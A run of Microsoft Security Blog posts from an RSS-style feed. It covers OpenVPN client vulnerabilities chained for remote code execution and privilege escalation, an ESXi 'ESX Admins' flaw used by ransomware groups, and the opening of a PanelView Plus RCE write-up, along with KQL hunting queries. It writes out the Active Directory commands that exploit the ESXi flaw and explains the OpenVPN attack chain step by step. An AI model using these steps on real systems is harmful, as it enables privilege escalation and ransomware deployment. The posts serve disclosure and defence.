With OpenVPN, peers can authenticate each other through multiple methods, including pre-shared secret keys, certificates, or username/password combinations. In multi-client server environments, the server can generate and issue an individual authentication certificate for each client, leveraging robust digital signatures and a trusted certificate authority. This ensures an elevated level of security and integrity in the authentication process, enhancing the overall reliability of the VPN connection. 

Diagram of OpenVPN's client server depicting the connection between the Gateway Client and the Access Server
Figure 1. OpenVPN client server model

Client-side architecture

The client-side architecture is where we discovered the additional three vulnerabilities (CVE-2024-27459, CVE-2024-24974, and CVE-2024-27903):

OpenVPN’s client architecture can be summarized in the following simplified diagram:

Diagram depicting the loaded plugin with the openvpn.exe usermode process connected by a named pope to the openvpnserv.exe system service within the client. The client is connected to the server via a tunnel.
Figure 2. OpenVPN client architecture with loaded plugin.dll

openvpnserv.exe and openvpn.exe

The system service launches elevated commands on behalf of the user, handling tasks such as adding or deleting DNS configurations, IP addresses, and routes, and enabling Dynamic Host Configuration Protocol (DHCP). These commands are received from the openvpn.exe process through a named pipe created for these two entities, such as “openvpn/service_XXX” where XXX is the thread ID (TID) that is being passed to the newly created process as a command line argument.

The launched commands arrive in the form of a binary structure that contains the relevant information for the specific command, with the structure being validated and only then launching the appropriate command. The below figure displays an example of the structure that contains information for adding/deleting DNS configuration:

Screenshot of code depicting the DNS configuration managing structure
Figure 3. OpenVPN DNS configuration managing structure

Additionally, openvpnserv.exe serves as the management unit, spawning openvpn.exe processes upon requests from different users on the machine. This can be done automatically using the OpenVPN GUI or by sending specifically crafted requests. Communication for this process occurs through a second named pipe, such as “openvpn/service”.

Openvpn.exe is the user mode process being spawned on behalf of the client. When openvpn.exe starts, it receives a path for a configuration file (as a command line argument). The configuration file that’s provided holds different information.

A lot of fields can be managed in configuration files, such as:

  1. Tunnel options
  2. Server mode options
  3. Client mode options

Plugin mechanism in openvpn.exe

Another mechanism of interest for us is the plugin mechanism in openvpn.exe, which can extend the functionality to add additional logic, such as authentication plugins to bring authentication against Lightweight Directory Access Protocol (LDAP) or Radius or other Pluggable Authentication Module
(PAM) backends. Some of the existing plugins are:

  1. Radiusplugin – Radius authentication support for open OpenVPN.
  2. Eurephia – Authentication and access control plugin for OpenVPN.
  3. Openvpn_defer_auth – OpenVPN plugin to perform deferred authentication requests.

The plugin mechanism fits into the earlier diagram, as shown in Figure 2.

The plugin is loaded as a directive in the configuration file, which looks like:

Screenshot of code depicting the client directive to load the plugin
Figure 4. OpenVPN client directive to load plugin

Furthermore, the number of callbacks defined in the plugin launch on behalf of the loading process (openvpn.exe), such as:

  1. openvpn_plugin_func_v1 – This function is called by OpenVPN each time the OpenVPN reaches a point where plugin calls should happen.
  2. openvpn_plugin_{open, func}_v3() – Defines the version of the v3 plugin argument.

OpenVPN security model

As previously mentioned, we discovered four vulnerabilities on the client side of OpenVPN’s architecture.

As described before, openvpnserv.exe (SYSTEM service) spawns the openvpn.exe process as a result of the request from the user. Furthermore, the spawned process runs in the context of the user who requested to create the new process, which is achieved through named pipe impersonation, as displayed in the below image:

Screenshot of code depicting named pipe impersonation
Figure 5. Named pipe impersonation

The ImpersonateNamedPipeClient function impersonates a named pipe client application.

Furthermore, to prevent unwanted behavior, specific EXPLICIT_ACCESS must be granted for any new process:

Screenshot of code depicting explicit access being granded for OVPN DACL
Figure 6. Explicit access for OVPN DACL

This explicit access, in addition to the earlier described “elevated commands” launched by openvpnserv.exe on request from the openvpn.exe process, and other comprehensive inspection of the passed arguments  ensure that malicious behavior cannot be launched in the name of the impersonated user.

Vulnerability analysis

CVE-2024-1305    

We identified a vulnerability in the “tap-windows6” project that involves developing the Terminal Access Point (TAP) adapter used by OpenVPN. In the project’s src folder, the device.c file contains the code for the TAP device object and its initialization.

In the device.c file, the CreateTapDevice method initializes a dispatch table object with callbacks for methods managing various Input/Output Controls (IOCTLs) for the device. One of these methods is TapDeviceWrite, which handles the write IOCTL.

Screenshot of code depicting where the wild kernel overflow vulnerability is located
Figure 7. Wild kernel overflow vulnerability location

The TapDeviceWrite method performs several operations and eventually calls TapSharedSendPacket. This method, in turn, calls NdisAllocateNetBufferAndNetBufferLists twice. In one scenario, it calls this function with the fullLength parameter, defined as follows:

Screenshot of code depicting the integer overflow
Figure 8. Integer overflow

Both PacketLength and PrefixLength are parameters passed from the TapDeviceWrite call and, therefore, attacker controlled. If these values are large enough, their sum (fullLength) can overflow (a 32-bit unsigned integer). This overflow results in the allocation of a smaller-than-expected memory size, which subsequently causes a memory overflow issue.

CVE-2024-27459  

The second vulnerability that we discovered resided in the communication mechanism between the openvpn.exe process and the openvpnserv.exe service. As described earlier, both of which communicate through a named pipe:

Screenshot of code depicting the size being read from a named pipe
Figure 9. Reading size from a named pipe

The openvpnserv.exe service will read the message size in an infinite loop from the openvpn.exe process and then handle the message received by calling the HandleMessage method. The HandleMessage method reads the size provided by the infinite loop and casts the read bytes into the relevant type accordingly:

Screenshot of code depicting the stack overflow vulnerability location
Figure 10. Stack overflow vulnerability location

This communication mechanism presents an issue as reading the “user” provided number of bytes on to an “n bytes” long structure located on the stack will produce a stack overflow vulnerability.

CVE-2024-24974  

The third vulnerability involves unprivileged access to an operating system resource. The openvpnserv.exe service spawns a new openvpn.exe process based on user requests received through the “\\openvpn\\service” named pipe. This vulnerability allows remote access to the named service pipe, enabling an attacker to remotely interact with and launch operations on it.

CVE-2024-27903  

Lastly, we identified a vulnerability in OpenVPN’s plugin mechanism that permits plugins to be loaded from various paths on an endpoint device. This behavior can be exploited by attackers to load harmful plugins from these different paths.

Exploiting and chaining the vulnerabilities

All the identified vulnerabilities can be exploited once an attacker gains access to a user’s OpenVPN credentials, which could be accomplished using credential theft techniques, such as purchasing stolen credentials on the dark web, using info-stealing malware, or sniffing network traffic to capture NTLMv2 hashes and then using cracking tools like HashCat or John the Ripper to decode them. The discovered vulnerabilities could then be combined to achieve different exploitation results, or chained together to form a sophisticated attack chain, as detailed in the below sections.

RCE exploitation

We first explored how an attacker could achieve remote code execution (RCE) exploitation using CVE-2024-24974 and CVE-2024-27903.

To successfully exploit these vulnerabilities and achieve RCE, an attacker must first obtain an OpenVPN user’s credentials. The attacker’s device must then launch the NET USE command with the stolen credentials to remotely access the operating system resources and grant the attacker access to the named pipes objects devices.

Next, the attacker can send a “connect” request to the “\\openvpn\\service” named pipe to launch a new instance of openvpn.exe on its behalf.

Screenshot of code depicting the initialization of OpenVPN from a remote location
Figure 11. Initializing OpenVPN from a remote location (in which {TARGET_MACHINE_PLACEHOLDER} can be substituted by a different end point)

In the request, a path to a configuration file (\\\\DESKTOP-4P6938I\\share\\OpenVPN\\config\\sample.ovpn) is specified that’s located on the attacker-controlled device. A log path is also provided into which the loaded plugin will write its logs (“–log \\\\\{TARGET_MACHINE_PLACEHOLDER}\\share\\OpenVPN\\log\\plugin_log.txt\).

The provided configuration has instructions to load malicious plugin, as such:

Screenshot of code depicting the malicious plugin loading directive from a remote location
Figure 12. Malicious plugin loading directive from a remote location

After successful exploitation, the attacker can read the log provided on the attacker-controlled device.

Screenshot of the plugin log on the attacker-controlled device
Figure 13. Plugin log on the attacker-controlled device

LPE exploitation

Next, we investigated how an attacker could achieve local privilege execution (LPE) using CVE-2024-27459 and CVE-2024-27903. To successfully achieve an LPE exploit in this context, an attacker must load a malicious plugin into the normal launching process of openvpn.exe by using a malicious configuration file.

First, the attacker will connect to a local device “\\openvpn\\service” named pipe with a command that instructs openvpnserv.exe to launch openvpn.exe based on the attacker-provided malicious configuration.

Screenshot of code depicting initializing OpenVPN from a local configuration
Figure 14. Initializing OpenVPN from a local configuration

The malicious configuration will include a line like the below example:

Screenshot of the malicious plugin loading directive from the local location
Figure 15. Malicious plugin loading directive from the local location

For the malicious plugin to successfully communicate with openvpnserv.exe, it must hijack the number of the handle used by openvpn.exe to communicate with the inner named pipe connecting the openvpv.exe process and the openvpnserv.exe service. This can be achieved, for instance, by parsing command line arguments, as displayed below:

Screenshot of code depicting parsing command line arguments to extract the thread ID
Figure 16. Parsing command line arguments to extract the thread ID (TID)

This works because when the openvpn.exe process spawns, it’s being passed the TID (as a command line argument) that the inner named pipe (which is being used for communication between this specific OpenVPN instance and the openvpnserv.exe service) will have. For instance, if the inner named pipe created is “\\openvpn\\service_1234” then openvpn.exe will be launched with an extra argument of 1234.

Screenshot of code depicting the thread ID being passed as a command line argument
Figure 17. Passing the TID as a command line argument

Next, attackers can exploit the stack overflow vulnerability by sending data bigger than the MSG structure. It is important to note that there are stack protection mechanisms in place, called stack canaries, which make exploitation much more challenging. Thus, when triggering the overflow:

Screenshot of code depicting the stack overflow being triggered
Figure 18. Stack overflow triggered

After the crash of openvpnserv.exe, the attacker has a slot of time in which they can reclaim the named pipe “\\openvpn\\service”.

If successful, the attacker then poses as the server client side of the named pipe “\\openvpn\\service”. From that moment on, every attempt to connect to the “\\openvpn\\service” named pipe will result in a connection to the attacker. If a privileged enough user, such as a SYSTEM or Administrator user, is connected to the named pipe, the attacker can impersonate that user:

Screenshot of code depicting impersonation of a privileged user
Figure 19. Impersonating a privileged user

The attacker can then start an elevated process on the user’s behalf, thus achieving LPE.

Chaining it all together

As our research demonstrated, an attacker could leverage at least three of the four discovered vulnerabilities to create exploits to achieve RCE and LPE, which could then be chained together to create a powerful attack chain.

A number of adjustments are needed for the full attack chain to be exploited as presented in this blog post, mainly the malicious payload that crashes openvpnserv.exe and the malicious payload that actually behaves as openvpnserv.exe after openvpnserv.exe is crashed all have to be loaded with the malicious plugin. After successfully achieving LPE, attackers will use different techniques, such as Bring Your Own Vulnerable Driver (BYOVD) or exploiting known vulnerabilities, to achieve a stronger grasp of the endpoint. Through these techniques, the attacker can, for instance, disable Protect Process Light (PPL) for a critical process such as Microsoft Defender or bypass and meddle with other critical processes in the system. These actions enable attackers to bypass security products and manipulate the system’s core functions, further entrenching their control and avoiding detection.

Critical importance of endpoint security in private and enterprise sectors

With OpenVPN being widely used across various vendors, industries, and fields, the presented vulnerabilities may impact numerous sectors, device types, and verticals. Exploiting these vulnerabilities requires user authentication, a deep understanding of OpenVPN’s inner workings, and intermediate knowledge of the operating system. However, a successful attack could significantly impact endpoints in both the private and enterprise sectors. Attackers could launch a comprehensive attack chain on a device using a vulnerable version of OpenVPN, achieving full control over the target endpoint. This control could enable them to steal sensitive data, tamper with it, or even wipe and destroy critical information, causing substantial harm to both private and enterprise environments.

The discovery of these vulnerabilities underscores the importance of responsible disclosure to secure enterprise and endpoint systems, in addition to the collective efforts of the security community to protect devices across various platforms and establish stronger safeguards for everyone. We would like to again thank OpenVPN for their partnership and swift action in addressing these vulnerabilities.

Mitigation and protection guidance

OpenVPN versions prior to 2.5.10 and 2.6.10 are vulnerable to discussed vulnerabilities.

It is recommended to first identify if a vulnerable version is installed and, if so, immediately apply the relevant patch found here: OpenVPN 2.6.10.

Additionally, follow the below recommendations to further mitigate potential exploitation risks affiliated with the discovered vulnerabilities:

  • Apply patches to affected devices in your network. Check the OpenVPN website for the latest patches.
  • Make sure OpenVPN clients are disconnected from the internet and segmented.
  • Limit access to OpenVPN clients to authorized users only. 
  • Due to the nature of the CVEs, which still require a username and password, prioritizing patching is difficult. Reduce risk by ensuring proper segmentation, requiring strong usernames and passwords, and reducing the number of users that have writing authentication.

Microsoft Defender XDR detections

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alert can indicate associated threat activity:

  • Suspicious OpenVPN named pipe activity

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

  • CVE-2024-27459
  • CVE-2024-24974
  • CVE-2024-27903
  • CVE-2024-1305

Microsoft Defender for IoT

Microsoft Defender for IoT raises alerts for the following vulnerabilities, exploits, and behavior associated with this threat:

  • Suspicion of Malicious Activity

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

This query identifies connection to OpenVPN’s named pipe from remote host:

DeviceEvents  
| where ActionType == "NamedPipeEvent"
| extend JsonAdditionalFields=parse_json(AdditionalFields)
| extend PipeName=JsonAdditionalFields["PipeName"]
| where PipeName == "\\Device\\NamedPipe\\openvpn\\service" and isnotempty( RemoteIP) 

This query identifies image load into OpenVPN’s process from share folder:

DeviceImageLoadEvents 
|where InitiatingProcessFileName == "openvpn.exe" and FolderPath startswith "\\\\"

This query identifies process connect to OpenVPN’s named pipe as server which it is not openvpnserv.exe:

DeviceEvents  
| where ActionType == "NamedPipeEvent"
| extend JsonAdditionalFields=parse_json(AdditionalFields)
| extend PipeName=JsonAdditionalFields["PipeName"], NamedPipeEnd=JsonAdditionalFields["NamedPipeEnd"]
|where PipeName == "\\Device\\NamedPipe\\openvpn\\service" and NamedPipeEnd == "Server" and InitiatingProcessFileName != "openvpnserv.exe"

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here:  https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.

List of devices with OpenVPN vulnerabilities

DeviceTvmSoftwareVulnerabilities
| where OSPlatform contains "Windows"
| where CveId in ("CVE-2024-27459","CVE-2024-24974","CVE-2024-27903","CVE-2024-1305") 
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,
CveId,VulnerabilitySeverityLevel
| join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,
CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware

Named pipe creation activity of OpenVPN

let PipeNames = pack_array('\\openvpn/service','\\openvpn/service_','openvpn','openvpn/service','\\openvpn\\service_');
DeviceEvents
| where TimeGenerated > ago(30d)
| where ActionType == "NamedPipeEvent"
| where ProcessCommandLine contains "openvpn.exe" or InitiatingProcessCommandLine contains "openvpn.exe"
| extend Fields=parse_json(AdditionalFields)
| where Fields.FileOperation == "File created"
| where Fields.PipeName has_any (PipeNames)
| project TimeGenerated,ActionType,DeviceName,InitiatingProcessAccountDomain,InitiatingProcessAccountName,InitiatingProcessFolderPath,
InitiatingProcessCommandLine,ProcessCommandLine,Fields.FileOperation,Fields.PipeName

Vladimir Tokarev

Microsoft Threat Intelligence Community

References

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Chained for attack: OpenVPN vulnerabilities discovered leading to RCE and LPE appeared first on Microsoft Security Blog.

]]>
Ransomware operators exploit ESXi hypervisor vulnerability for mass encryption http://approjects.co.za/?big=en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/ Mon, 29 Jul 2024 16:00:00 +0000 Microsoft Security researchers have observed a vulnerability used by various ransomware operators to get full administrative access to domain-joined ESXi hypervisors and encrypt the virtual machines running on them. The vulnerability involves creating a group called “ESX Admins” in Active Directory and adding an attacker-controlled user account to this group. This manipulation of the Active Directory group takes advantage of a privilege escalation vulnerability (CVE-2024-37085) in ESXi hypervisors that grants the added user full administrative access to the ESXi hypervisor. The vulnerability was fixed by VMware in their June release and ESXi administrators should install this security update.

The post Ransomware operators exploit ESXi hypervisor vulnerability for mass encryption appeared first on Microsoft Security Blog.

]]>
Microsoft researchers have uncovered a vulnerability in ESXi hypervisors being exploited by several ransomware operators to obtain full administrative permissions on domain-joined ESXi hypervisors. ESXi is a bare-metal hypervisor that is installed directly onto a physical server and provides direct access and control of underlying resources. ESXi hypervisors host virtual machines that may include critical servers in a network. In a ransomware attack, having full administrative permission on an ESXi hypervisor can mean that the threat actor can encrypt the file system, which may affect the ability of the hosted servers to run and function. It also allows the threat actor to access hosted VMs and possibly to exfiltrate data or move laterally within the network.

The vulnerability, identified as CVE-2024-37085, involves a domain group whose members are granted full administrative access to the ESXi hypervisor by default without proper validation. Microsoft disclosed the findings to VMware through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR), and VMWare released a security update. Microsoft recommends ESXi server administrators to apply the updates released by VMware to protect their servers from related attacks, and to follow the mitigation and protection guidance we provide in this blog post. We thank VMWare for their collaboration in addressing this issue.

This blog post presents analysis of the CVE-2024-37085, as well as details of an attack that was observed by Microsoft to exploit the vulnerability. We’re sharing this research to emphasize the importance of collaboration among researchers, vendors, and the security community to continuously advance defenses for the larger ecosystem. As part of Microsoft’s commitment to improve security for all, we will continue to share intelligence and work with the security community to help protect users and organizations across platforms.

CVE-2024-37085 vulnerability analysis

Microsoft security researchers identified a new post-compromise technique utilized by ransomware operators like Storm-0506, Storm-1175, Octo Tempest, and Manatee Tempest in numerous attacks. In several cases, the use of this technique has led to Akira and Black Basta ransomware deployments. The technique includes running the following commands, which results in the creation of a group named “ESX Admins” in the domain and adding a user to it:

net group “ESX Admins” /domain /add

net group “ESX Admins” username /domain /add

While investigating the attacks and the described behavior, Microsoft researchers discovered that the threat actors’ purpose for using this command was to utilize a vulnerability in domain-joined ESXi hypervisors that allows the threat actor to elevate their privileges to full administrative access on the ESXi hypervisor. This finding was reported as part of a vulnerability disclosure to VMware earlier this year.

Further analysis of the vulnerability revealed that VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named “ESX Admins” to have full administrative access by default. This group is not a built-in group in Active Directory and does not exist by default. ESXi hypervisors do not validate that such a group exists when the server is joined to a domain and still treats any members of a group with this name with full administrative access, even if the group did not originally exist. Additionally, the membership in the group is determined by name and not by security identifier (SID).

Microsoft researchers identified three methods for exploiting this vulnerability:

  1. Adding the “ESX Admins” group to the domain and adding a user to it – This method is actively exploited in the wild by the abovementioned threat actors. In this method, if the “ESX Admins” group doesn’t exist, any domain user with the ability to create a group can escalate privileges to full administrative access to domain-joined ESXi hypervisors by creating such a group, and then adding themselves, or other users in their control, to the group.
  2. Renaming any group in the domain to “ESX Admins” and adding a user to the group or use an existing group member – This method is similar to the first, but in this case the threat actor needs a user that has the capability to rename some arbitrary groups and rename one of them to “ESX Admins”. The threat actor can then add a user or use a user that already exists in the group, to escalate privileges to full administrative access. This method was not observed in the wild by Microsoft.
  3. ESXi hypervisor privileges refresh – Even if the network administrator assigns any other group in the domain to be the management group for the ESXi hypervisor, the full administrative privileges to members of the “ESX Admins” group are not immediately removed and threat actors still could abuse it. This method was not observed in the wild by Microsoft.

Successful exploitation leads to full administrative access to the ESXi hypervisors, allowing threat actors to encrypt the file system of the hypervisor, which could affect the ability of the hosted servers to run and function. It also allows the threat actor to access hosted VMs and possibly to exfiltrate data or move laterally within the network.

Ransomware operators targeting ESXi hypervisors

Over the last year, we have seen ransomware actors targeting ESXi hypervisors to facilitate mass encryption impact in few clicks, demonstrating that ransomware operators are constantly innovating their attack techniques to increase impact on the organizations they target.

ESXi is a popular product in many corporate networks, and in recent years, we have observed ESXi hypervisors become a favored target for threat actors. These hypervisors could be convenient targets if ransomware operators want to stay under the SOC’s radar because of the following factors:

  1. Many security products have limited visibility and protection for an ESXi hypervisor.
  2. Encrypting an ESXi hypervisor file system allows one-click mass encryption, as hosted VMs are impacted. This could provide ransomware operators with more time and complexity in lateral movement and credential theft on each device they access.

Therefore, many ransomware threat actors like Storm-0506, Storm-1175, Octo Tempest, Manatee Tempest, and others support or sell ESXi encryptors like Akira, Black Basta, Babuk, Lockbit, and Kuiper (Figure 1). The number of Microsoft Incident Response (Microsoft IR) engagements that involved the targeting and impacting ESXi hypervisors have more than doubled in the last three years.

Screenshot of post about ESXi unauthenticated shell for sale in the dark web
Figure 1. ESXi unauthenticated shell for sale on the dark web

Storm-0506 Black Basta ransomware deployment

Earlier this year, an engineering firm in North America was affected by a Black Basta ransomware deployment by Storm-0506. During this attack, the threat actor used the CVE-2024-37085 vulnerability to gain elevated privileges to the ESXi hypervisors within the organization.

The threat actor gained initial access to the organization via Qakbot infection, followed by the exploitation of a Windows CLFS vulnerability (CVE-2023-28252) to elevate their privileges on affected devices. The threat actor then used Cobalt Strike and Pypykatz (a Python version of Mimikatz) to steal the credentials of two domain administrators and to move laterally to four domain controllers.

On the compromised domain controllers, the threat actor installed persistence mechanisms using custom tools and a SystemBC implant. The actor was also observed attempting to brute force Remote Desktop Protocol (RDP) connections to multiple devices as another method for lateral movement, and then again installing Cobalt Strike and SystemBC. The threat actor then tried to tamper with Microsoft Defender Antivirus using various tools to avoid detection.

Microsoft observed that the threat actor created the “ESX Admins” group in the domain and added a new user account to it, following these actions, Microsoft observed that this attack resulted in encrypting of the ESXi file system and losing functionality of the hosted virtual machines on the ESXi hypervisor.   The actor was also observed to use PsExec to encrypt devices that are not hosted on the ESXi hypervisor. Microsoft Defender Antivirus and automatic attack disruption in Microsoft Defender for Endpoint were able to stop these encryption attempts in devices that had the unified agent for Defender for Endpoint installed.

Attack chain diagram of an attack by Storm-0506 from initial access via Qakbot infection followed by multiple malicious actions that lead to the exploitation of the ESXi vulnerability and eventual deployment of Black Basta ransomware and mass encryption of VMs in ESXi hypervisor
Figure 2. Storm-0506 attack chain

Mitigation and protection guidance

Microsoft recommends organizations that use domain-joined ESXi hypervisors to apply the security update released by VMware to address CVE-2024-37085. The following guidelines will also help organizations protect their network from attacks:

  • Install software updates – Make sure to install the latest security updates released by VMware on all domain-joined ESXi hypervisors. If installing software updates is not possible, you can use the following recommendations to reduce the risk:
    • Validate the group “ESX Admins” exists in the domain and is hardened.
    • Change the admin group to a different group in the ESXi hypervisor.
    • Add custom detections in XDR/SIEM for the new group name.  
    • Configure sending ESXi logs to a SIEM system and monitor suspicious full administrative access.
  • Credential hygiene – To utilize the different vulnerability methods, threat actors require control of a highly privileged user in the organization. Therefore, our recommendation is making sure to protect your highly privileged accounts in the organization, especially those that can manage other domain groups:
    • Enforce multifactor authentication (MFA) on all accounts, remove users excluded from MFA, and strictly require MFA from all devices, in all locations, always.
    • Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to this article for the different authentication methods and features.
    • Isolate privileged accounts from productivity accounts to protect administrative access to the environment. Refer to this article to understand best practices.
  • Improve critical assets posture – Identify your critical assets in the network, such as  ESXi hypervisors and vCenters (a centralized platform for controlling VMware vSphere environments), and make sure to get them protected with latest security updates, proper monitoring procedures and backup and recovery plans. More information can be found in this article.
  • Identify vulnerable assets – Use Microsoft Defender Vulnerability Management to reduce risk with continuous vulnerability assessment of ESXi hypervisor out of the box.

Microsoft Defender XDR detections

Microsoft Defender for Endpoint             

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

  • Suspicious modifications to ESX Admins group

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

  • New group added suspiciously
  • Suspicious Windows account manipulation
  • Compromised account conducting hands-on-keyboard attack

Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate associated threat activity:

  • Suspicious creation of ESX group

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft Defender Threat Intelligence to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments:

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their networks

This query identifies ESXi hypervisors in the organization:

DeviceInfo
| where OSDistribution =~ "ESXi"
| summarize arg_max(Timestamp, *) by DeviceId

This query identifies ESX Admins group changes in the Active directory:

IdentityDirectoryEvents
| where Timestamp >= ago(30d)
| where AdditionalFields has ('esx admins')

The following queries are for assessing the already discovered ESXi with the Microsoft Defender Vulnerability Management information:

DeviceInfo
| where OSDistribution =~ "ESXi"
| summarize arg_max(Timestamp, *) by DeviceId
| join kind=inner (DeviceTvmSoftwareVulnerabilities) on DeviceId
DeviceInfo
| where OSDistribution =~ "ESXi"
| summarize arg_max(Timestamp, *) by DeviceId
| join kind=inner (DeviceTvmSecureConfigurationAssessment) on DeviceId

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel also has a range of hunting queries available in Sentinel GitHub repo or as part of Sentinel solutions that customers can use to detect the activity detailed in this blog in addition to Microsoft Defender detections. These hunting queries include the following:

Qakbot:

Cobalt Strike:

References

Danielle Kuznets Nohi, Edan Zwick, Meitar Pinto, Charles-Edouard Bettan, Vaibhav Deshmukh

Microsoft Threat Intelligence Community

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Ransomware operators exploit ESXi hypervisor vulnerability for mass encryption appeared first on Microsoft Security Blog.

]]>
Vulnerabilities in PanelView Plus devices could lead to remote code execution http://approjects.co.za/?big=en-us/security/blog/2024/07/02/vulnerabilities-in-panelview-plus-devices-could-lead-to-remote-code-execution/ Tue, 02 Jul 2024 16:00:00 +0000 Microsoft discovered and responsibly disclosed two vulnerabilities in Rockwell’s PanelView Plus that could be remotely exploited by unauthenticated attackers, allowing them to perform remote code execution (RCE) and denial-of-service (DoS). PanelView Plus devices are graphic terminals, which are known as human machine interface (HMI) and are used in the industrial space.

The post Vulnerabilities in PanelView Plus devices could lead to remote code execution appeared first on Microsoft Security Blog.

]]>
Microsoft discovered and responsibly disclosed two vulnerabilities in Rockwell Automation PanelView Plus that could be remotely exploited by unauthenticated attackers, allowing them to perform remote code execution (RCE) and denial-of-service (DoS). The RCE vulnerability in PanelView Plus involves two custom classes that can be abused to upload and load a malicious DLL into the device. The DoS vulnerability takes advantage of the same custom class to send a crafted buffer that the device is unable to handle properly, thus leading to a DoS.

PanelView Plus devices are graphic terminals, also known as human machine interface (HMI) and are used in the industrial space. These vulnerabilities can significantly impact organizations using the affected devices, as attackers could exploit these vulnerabilities to remotely execute code and disrupt operations.

We shared these findings with Rockwell Automation through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR) in May and July 2023. Rockwell published two advisories and released security patches in September and October 2023. We want to thank the Rockwell Automation product security team for their responsiveness in fixing this issue. We highly recommend PanelView Plus customers to apply these security patches.

The discovered vulnerabilities are summarized in the table below:

CVE IDCVSS ScoreVulnerability
CVE-2023-20719.8Remote code execution (RCE)
CVE-2023-294648.2DoS via out-of-bounds read

In this blog post, we will focus on the technical details of the CVE-2023-2071 remote code execution vulnerability and how it was discovered, as well as provide an overview of the protocol used for both the RCE and DoS vulnerabilities. Additionally, we will offer technical details about the vulnerability and demonstrate the exploitation method. By sharing this research with the larger security community, we aim to emphasize the importance of collaboration in the effort to secure platforms and devices.

Suspicious remote registry query

One of the primary responsibilities of the Microsoft Defender for IoT research team is to ensure that the product properly analyzes various operational technology (OT) and Internet of Things (IoT) protocols. During this process, we observed a legitimate packet capture of two devices communicating using the Common Industrial Protocol (CIP), with one device sending a request containing a path to a registry value named “ProductCode,” and the other device responding with what appeared to be the product code value. The lack of encryption and absence of prior authentication in the communication raised concerns, as it appeared to involve a remote registry query. Further investigation revealed that the requesting device was an engineering workstation, and the responding device was an HMI – specifically, PanelView Plus.

We hypothesized that this remote registry querying functionality could be abused by querying system keys to access secrets or even gain remote control. To validate this hypothesis, we needed to locate the code responsible for this functionality. Since the two devices communicated using the CIP, our first step was to understand the protocol in depth.

Screenshot of the packet that triggered our investigation and led to our discovery of the vulnerability
Figure 1. The packet that triggered our investigation

Object-oriented protocol for industrial automation applications

CIP is an industrial protocol designed for industrial automation applications. Various vendors in the industrial sector utilize this protocol, and the communication we observed took place over Ethernet/IP – a protocol that adapts CIP to standard Ethernet.

According to the official CIP documentation: “A CIP node is modeled as a collection of Objects. (…) A Class is a set of Objects that all represent the same kind of system component. An Object Instance is the actual representation of a particular Object within a Class.”

From this description, we can deduce that CIP is an object-oriented protocol, where messages are directed towards specific objects, identified by their Class ID and Object Instance ID. Additionally, the term “Service Code” is defined as: “An integer identification value which denotes an action request that can be directed at a particular object instance or object attribute”. Therefore, when messaging an object, we should also specify a Service Code, which informs the object what action it should perform.

The CIP specification outlines common Class IDs and Service IDs, as well as ranges for vendor-specific IDs.

Screenshot of the packet, showing Class ID, Service ID, and vendor-specific ID.
Figure 2. The packet’s fields

Returning to the packet capture, we observed that both Service ID and Class ID values were vendor specific. This means that to understand the meaning of these Class and Service IDs and locate the code responsible for the functionality, we must analyze the HMI firmware.

Firmware analysis

